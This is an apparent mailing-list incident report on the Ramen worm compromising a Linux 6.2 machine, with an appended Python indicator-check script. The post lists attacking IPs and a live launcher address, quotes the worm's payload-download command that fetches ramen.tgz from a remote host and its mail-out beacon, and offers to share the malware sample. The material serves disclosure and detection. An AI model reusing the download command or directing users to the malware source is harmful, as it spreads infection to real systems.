After seeing a lot of scans on 111, I decided to put a standard-install Linux
6.2 machine online to see what would happen.
The surprise came 2 hours after I put the PC online .... A worm had
comfortably installed itself in control of the PC and had started scanning
for other PCs ..... Obviously I pulled it off the network immediately .... And
I started studying it.


This is what I sent to BugTraq, but it seems the guys don't want to post
anything from me, for reasons that are beyond me ....
===================================================================
Same problems here :
38.232.191.200
24.169.70.243
194.102.254.118
63.146.209.50
130.111.148.69


But the most interesting is:
130.111.148.69, which seems to be a worm launcher site.
It will connect to the target machine on 111 or 21 and will exploit the
well-known rpc.statd and wu-ftp 2.6.0 bug to
gain root on the remote machine.

The tar itself is downloaded from that machine on port 27374.

" lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz "

After a successful install it seems it will send a mail with the command:
" echo Eat Your Ramen! | mail -s % % " to some obscure hotmail.com
account.

It seems that it has some sort of class B scanner and exploits for
rpc.statd and
wu-ftpd

If anyone is interested in taking a deeper look at it, mail me and I will
send the ramen.tgz, or you can get it from the site I mentioned above.
========================================================
Immediately after installation it modifies inetd.conf, starts listening on
that same port 27374, and begins scanning.
And believe me, it scans at a remarkable speed .... straight through random
class B networks ....


--
Lead programmer,
Mihai Moldovanu ([EMAIL PROTECTED])
WEB:    http://tfm.profm.ro/
        http://www.developers.ro/
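
A host check for the two on-disk indicators named in the message above (an inetd.conf entry listening on port 27374 and the /usr/src/.poop download directory), added here as an example and not part of the original post. The sample files are constructed, and the service name `examplesvc` and its program path are placeholders, since the post does not show the worm's actual inetd.conf entry.

```python
import os

RAMEN_PORT = 27374             # listener/download port named in the post
RAMEN_DIR = "usr/src/.poop"    # directory from the lynx command in the post

def parse_services(text):
    """Map (name, proto) -> port from /etc/services-style text."""
    table = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2 or "/" not in fields[1]:
            continue
        port, proto = fields[1].split("/", 1)
        if port.isdigit():
            for name in [fields[0]] + fields[2:]:   # canonical name + aliases
                table.setdefault((name, proto), int(port))
    return table

def inetd_ports(inetd_text, services):
    """Return [(port, entry)] for every active (uncommented) inetd.conf entry."""
    found = []
    for line in inetd_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        service, proto = fields[0], fields[2]
        # inetd accepts a service name (resolved via /etc/services) or a number
        port = int(service) if service.isdigit() else services.get((service, proto))
        found.append((port, line.strip()))
    return found

def ramen_indicators(root, inetd_text, services_text):
    """List the indicators from the post that are present on this host image."""
    hits = []
    for port, entry in inetd_ports(inetd_text, parse_services(services_text)):
        if port == RAMEN_PORT:
            hits.append("inetd listener on %d: %s" % (RAMEN_PORT, entry))
    if os.path.isdir(os.path.join(root, RAMEN_DIR)):
        hits.append("directory present: /" + RAMEN_DIR)
    return hits

# Constructed sample files; service name and program path are placeholders.
SAMPLE_SERVICES = "ftp 21/tcp\nsunrpc 111/tcp portmapper\nexamplesvc 27374/tcp\n"
SAMPLE_INETD = (
    "ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a\n"
    "#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\n"
    "examplesvc stream tcp nowait root /path/to/placeholder placeholder\n"
)

if __name__ == "__main__":
    for hit in ramen_indicators("/", SAMPLE_INETD, SAMPLE_SERVICES):
        print(hit)
```

On a real host or a mounted disk image, pass the contents of its `etc/inetd.conf` and `etc/services` and the image's mount point as `root`.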


